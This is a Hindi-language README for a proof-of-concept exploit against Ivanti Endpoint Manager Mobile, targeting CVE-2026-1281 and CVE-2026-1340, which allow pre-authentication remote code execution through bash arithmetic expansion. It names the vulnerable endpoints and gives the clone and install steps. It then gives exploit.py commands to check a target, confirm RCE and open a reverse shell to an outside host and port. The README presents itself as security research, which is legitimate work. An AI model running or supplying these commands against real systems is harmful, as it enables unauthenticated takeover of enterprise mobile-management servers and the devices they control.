
# CVE-2026-1281 और CVE-2026-1340 के लिए प्रूफ ऑफ कॉन्सेप्ट - Ivanti EPMM प्री-ऑथ RCE बैश अरिथमेटिक एक्सपैंशन के माध्यम से
⚠️ अस्वीकरण: यह PoC केवल शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए प्रदान किया गया है। स्पष्ट अनुमति के बिना उपयोग अवैध है।
CVE-2026-1281 और CVE-2026-1340 कमजोरियों के शोषण के लिए पूर्ण Proof of Concept (PoC) जो Ivanti Endpoint Manager Mobile (EPMM) को प्रभावित करती हैं। ये कमजोरियाँ Bash Arithmetic Expansion तंत्र के माध्यम से बिना प्रमाणीकरण के दूरस्थ रूप से मनमाना कोड निष्पादन (RCE) की अनुमति देती हैं।
/mifs/c/appstore/fob/ एंडपॉइंट में कोड इंजेक्शन/mifs/c/aftstore/fob/ एंडपॉइंट में कोड इंजेक्शनgit clone https://github.com/MehdiLeDeaut/CVE-2026-1281-Ivanti-EPMM-RCE.git
cd CVE-2026-1281-Ivanti-EPMM-RCE
pip3 install -r requirements.txt
chmod +x *.py
# कमजोरी परीक्षण
python3 exploit.py -t https://target.com -c
# RCE सत्यापन
python3 exploit.py -t https://target.com --test-rce
# रिवर्स शेल
python3 exploit.py -t https://target.com --reverse-shell 10.10.14.5:4444
Mehdi Le Deaut - Cybersecurity Consultant | Red Team Specialist
यह प्रोजेक्ट MIT लाइसेंस के अंतर्गत है - अधिक विवरण के लिए LICENSE फ़ाइल देखें।